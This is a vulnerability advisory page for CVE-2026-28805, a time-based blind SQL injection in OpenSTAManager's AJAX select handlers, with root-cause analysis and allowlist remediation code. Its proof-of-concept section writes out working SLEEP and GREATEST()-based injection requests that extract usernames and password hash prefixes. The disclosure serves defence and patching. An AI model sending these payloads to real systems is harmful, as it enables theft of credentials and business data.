Skip to main content

PHP CVE-2026-28805

HIGH
SQL Injection (CWE-89)
2026-04-01 https://github.com/devcode-it/openstamanager GHSA-3gw8-3mg3-jmpc
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Analysis Generated
Apr 01, 2026 - 21:00 vuln.today
Patch released
Apr 01, 2026 - 21:00 nvd
Patch available
CVE Published
Apr 01, 2026 - 19:46 nvd
HIGH 8.8

DescriptionGitHub Advisory

Description

Multiple AJAX select handlers in OpenSTAManager <= 2.10.1 are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect['stato'] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation.

An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database.

Affected Endpoints

Three modules share the same vulnerability pattern:

1. Preventivi (Quotes) - Primary

  • Endpoint: GET /ajax_select.php?op=preventivi
  • File: modules/preventivi/ajax/select.php, line 60
  • Required parameters: options[idanagrafica] (any valid ID)

Vulnerable code:

php
// modules/preventivi/ajax/select.php, lines 59-60
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';
$where[] = '('.$stato.' = 1)';

The $stato variable is inserted as a bare expression inside parentheses. The resulting SQL fragment becomes ({user_input} = 1), allowing an attacker to break out of the expression and inject arbitrary SQL.

2. Ordini (Orders)

  • Endpoint: GET /ajax_select.php?op=ordini-cliente
  • File: modules/ordini/ajax/select.php, line 52
  • Required parameters: options[idanagrafica] (any valid ID)

Vulnerable code:

php
// modules/ordini/ajax/select.php, lines 51-52
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_fatturabile';
$where[] = '`or_statiordine`.'.$stato.' = 1';

The $stato variable is inserted as a column name reference. The resulting SQL fragment becomes ` or_statiordine.{user_input} = 1 `, allowing injection after the table-column reference.

3. Contratti (Contracts)

  • Endpoint: GET /ajax_select.php?op=contratti
  • File: modules/contratti/ajax/select.php, line 57
  • Required parameters: options[idanagrafica] (any valid ID)

Vulnerable code:

php
// modules/contratti/ajax/select.php, lines 56-57
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';
$where[] = '`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE '.$stato.' = 1)';

The $stato variable is inserted inside a subquery. The resulting SQL fragment becomes WHERE {user_input} = 1), allowing an attacker to close the subquery and inject into the outer query.

Root Cause Analysis

Data Flow

  1. The attacker sends a GET request with options[stato]=<payload> to /ajax_select.php
  2. ajax_select.php (line 30) reads the value via filter('options'), which applies HTMLPurifier sanitization
  3. HTMLPurifier strips HTML tags and the > character, but does NOT strip SQL keywords (SELECT, SLEEP, IF, UNION, etc.) or SQL-significant characters ((, ), =, ', etc.)
  4. The sanitized value is passed to AJAX::select() in src/AJAX.php (line 40)
  5. AJAX::getSelectResults() assigns $superselect = $options (line 273) and requires the module's select.php file (line 275)
  6. The module's select.php reads $superselect['stato'] and concatenates it directly into the $where[] array
  7. AJAX::selectResults() joins all WHERE elements with AND and executes the query via Query::executeAndCount() (line 120)

Why HTMLPurifier is Insufficient

HTMLPurifier is an HTML sanitization library designed to prevent XSS attacks. It is not an SQL injection prevention mechanism. Specifically:

  • It does not strip SQL keywords: SELECT, SLEEP, IF, UNION, FROM, WHERE
  • It does not strip SQL operators: =, (, ), ,, +, -, *
  • It strips the > character (used in HTML), which can be bypassed using MySQL's GREATEST() function
  • It provides zero protection against SQL injection

Proof of Concept

Prerequisites

  • A valid user account on the OpenSTAManager instance (any privilege level)
  • Network access to the application

Step 1: Authenticate

POST /index.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

op=login&username=<user>&password=<pass>

Save the PHPSESSID cookie from the Set-Cookie response header.

Step 2: Verify Injection (SLEEP test)

Baseline request (normal response time ~200ms):

GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=is_pianificabile HTTP/1.1
Host: <target>
Cookie: PHPSESSID=<session>

Injection request (response time ~10 seconds):

GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1 HTTP/1.1
Host: <target>
Cookie: PHPSESSID=<session>

Expected result: The response is delayed by approximately 10 seconds, confirming that the SLEEP(10) function was executed by the database server. The response body in both cases is identical: {"results":[],"recordsFiltered":0}.

<img width="934" height="491" alt="image" src="https://github.com/user-attachments/assets/27beff84-3e25-43e1-b484-76db25c0faa8" />

Step 3: Data Extraction (demonstrating impact)

Using binary search with time-based boolean conditions, an attacker can extract arbitrary data. The > character is stripped by HTMLPurifier, so the GREATEST() function is used as an equivalent:

Extract username length:

GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(LENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1)),3%2B1)%3DLENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1))),SLEEP(2),0)))a)+AND+(1 HTTP/1.1

This technique was used to successfully extract:

  • Username: admin (5 characters, extracted character by character)
  • Password hash prefix: $2y$10$qAo04wNbhR9cpxjHzrtcnu... (bcrypt)
  • MySQL version: 8.3.0

PoC for Other Endpoints

Ordini (orders):

GET /ajax_select.php?op=ordini-cliente&options[idanagrafica]=1&options[stato]=is_fatturabile+%3D+1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+1 HTTP/1.1

Contratti (contracts):

GET /ajax_select.php?op=contratti&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+(1 HTTP/1.1

Both endpoints show the same SLEEP-based timing delay, confirming the injection.

Impact

  • Confidentiality: An attacker can extract the entire database contents, including user credentials (usernames and bcrypt password hashes), personal identifiable information (PII), financial records (invoices, quotes, contracts, payments), and application configuration.
  • Integrity: With MySQL's INSERT/UPDATE capabilities via subqueries, an attacker may be able to modify data.
  • Availability: An attacker can execute SLEEP() with large values or resource-intensive queries to cause denial of service.

Proposed Remediation

Option A: Allowlist Validation (Recommended)

Replace the direct concatenation with an allowlist of permitted column names:

php
// modules/preventivi/ajax/select.php - FIXED
$allowed_stati = ['is_pianificabile', 'is_completato', 'is_fatturabile', 'is_concluso'];
$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)
    ? $superselect['stato']
    : 'is_pianificabile';
$where[] = '('.$stato.' = 1)';
php
// modules/ordini/ajax/select.php - FIXED
$allowed_stati = ['is_fatturabile', 'is_evadibile', 'is_completato'];
$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)
    ? $superselect['stato']
    : 'is_fatturabile';
$where[] = '`or_statiordine`.'.$stato.' = 1';
php
// modules/contratti/ajax/select.php - FIXED
$allowed_stati = ['is_pianificabile', 'is_completato', 'is_fatturabile'];
$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)
    ? $superselect['stato']
    : 'is_pianificabile';
$where[] = '`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE '.$stato.' = 1)';

This approach is recommended because the stato parameter represents a database column name (not a value), so prepared statements cannot be used here. The allowlist ensures only known-safe column names are accepted.

Option B: Regex Validation (Alternative)

If the set of column names is dynamic, validate the format strictly:

php
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';
if (!preg_match('/^[a-z_]+$/i', $stato)) {
    $stato = 'is_pianificabile'; // fallback to safe default
}
$where[] = '('.$stato.' = 1)';

This ensures only alphabetic characters and underscores are accepted, preventing any SQL injection.

Option C: Backtick Quoting (Supplementary)

In addition to validation, wrap the column name in backticks to treat it as an identifier:

php
$where[] = '(`'.str_replace('`', '', $stato).'` = 1)';

Note: This alone is insufficient without input validation but provides defense-in-depth.

Global Recommendation

Audit all usages of $superselect across the codebase. Any value from $superselect that is used as part of a SQL expression (not as a parameterized value) must be validated against an allowlist. The prepare() function is already used correctly in other parts of the code - the issue is specifically where $superselect values are used as column names or bare expressions.

Credits

Omar Ramirez

AnalysisAI

Time-based blind SQL injection in OpenSTAManager ≤2.10.1 allows authenticated users to extract complete database contents including credentials, financial records, and PII through multiple AJAX select handlers. The vulnerability affects three core modules (preventivi, ordini, contratti) where the options[stato] GET parameter is concatenated directly into SQL WHERE clauses without validation. Exploitation requires only low-privilege authentication (CVSS PR:L) and has been confirmed with working

Technical ContextAI

OpenSTAManager is a PHP-based business management application using MySQL for data persistence. The vulnerability stems from a fundamental misunderstanding of input sanitization versus SQL injection prevention. Three AJAX select handlers in modules/preventivi/ajax/select.php (line 60), modules/ordini/ajax/select.php (line 52), and modules/contratti/ajax/select.php (line 57) read user-controlled options[stato] values through the filter('options') function, which applies HTMLPurifier sanitization. HTMLPurifier strips HTML tags and the greater-than character but preserves SQL metacharacters (parentheses, equals, commas) and keywords (SELECT, SLEEP, IF, UNION). The sanitized value flows through AJAX::select() into AJAX::getSelectResults(), where it populates $superselect['stato'] and is directly concatenated into SQL WHERE clauses as bare expressions like ({user_input} = 1) or column references like table.{user_input} = 1. This represents CWE-89 (SQL Injection) where dynamic query construction treats user input as code rather than data. The application uses Query::executeAndCount() for final execution, but by that point the malicious SQL is already embedded. The attack works despite HTMLPurifier sanitization because SQL injection requires sanitization at the SQL layer (parameterized queries or identifier whitelisting), not the HTML layer.

RemediationAI

Upgrade immediately to OpenSTAManager version 2.10.2 or later, released on GitHub at https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2. The vendor has released patches in commits 50b9089c506ba2ca249afb1dfead2af5d42c10e7 and 679c40fa5b3acad4263b537f367c0695ff9666dc, available at the patch URLs in the security advisory. The fix implements allowlist validation for the stato parameter in all three affected modules, restricting accepted values to known-safe column names like is_pianificabile, is_completato, is_fatturabile, and is_concluso. If immediate patching is not feasible, implement temporary workarounds by adding strict allowlist validation in modules/preventivi/ajax/select.php, modules/ordini/ajax/select.php, and modules/contratti/ajax/select.php before the WHERE clause construction. Example code: check if superselect['stato'] exists in a predefined array of permitted values using in_array(), defaulting to a safe value if validation fails. Additionally, apply web application firewall (WAF) rules to block requests containing SQL keywords (SELECT, SLEEP, UNION, IF) in the options[stato] parameter, though this is defense-in-depth only and not a substitute for patching. Organizations should audit

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-28805 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy